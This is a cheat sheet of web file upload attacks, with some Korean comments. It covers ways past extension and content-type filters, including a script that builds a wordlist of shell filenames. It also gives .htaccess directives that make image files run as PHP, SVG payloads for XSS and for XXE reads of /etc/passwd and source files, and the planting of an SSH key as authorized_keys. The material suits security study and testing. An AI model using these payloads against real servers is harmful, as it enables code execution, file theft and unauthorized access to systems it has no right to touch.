File Upload Attack

Bypasses

# Client-Side Bypass
Toggle Page Inspector

# Blacklist Bypass
.phps .phtml, pHp, pHP php7, phar, etc.

# PHP extensions
<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst>

# ASP extensions
<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP>

# Web extensions
/usr/share/seclists/Discovery/Web-Content/web-extensions.txt

# Whitelist Bypass
## Double extension
shell.jpg.php

# Reverse double extension
shell.php.jpg

# Character Injection
`%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\\`, `.`, `…`, `:`

for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done

# Content/Type Bypass
## List of All Content Types
<https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt>
cat web-all-content-types.txt | grep 'image/' > image-content-types.txt

# File Signatures / Magic Bytes
<https://en.wikipedia.org/wiki/List_of_file_signatures>

.htaccess

# uploads 디렉토리에서 .jpg 파일을 PHP로 해석하게 함
AddType application/x-httpd-php .jpg .jpeg .png

# 또는
AddHandler application/x-httpd-php .jpg .php .phtml

# 또는
<FilesMatch "\\.(jpg|jpeg|png)$">
    SetHandler application/x-httpd-php
</FilesMatch>

Magic Bytes

Limited Uploads

XSS
- HTML, JS, SVG, GIF

XXE/SSRF
- XML, SVG, PDF, PPT, DOC

# payload 1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "<http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd>">
<svg xmlns="<http://www.w3.org/2000/svg>" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>

# payload 2
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

# payload 3
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>

DoS
- ZIP, JPG, PNG

Upload + Directory Traversal

File Upload Private Key

kali@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileup
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in fileup
Your public key has been saved in fileup.pub
...

kali@kali:~$ cat fileup.pub > authorized_keys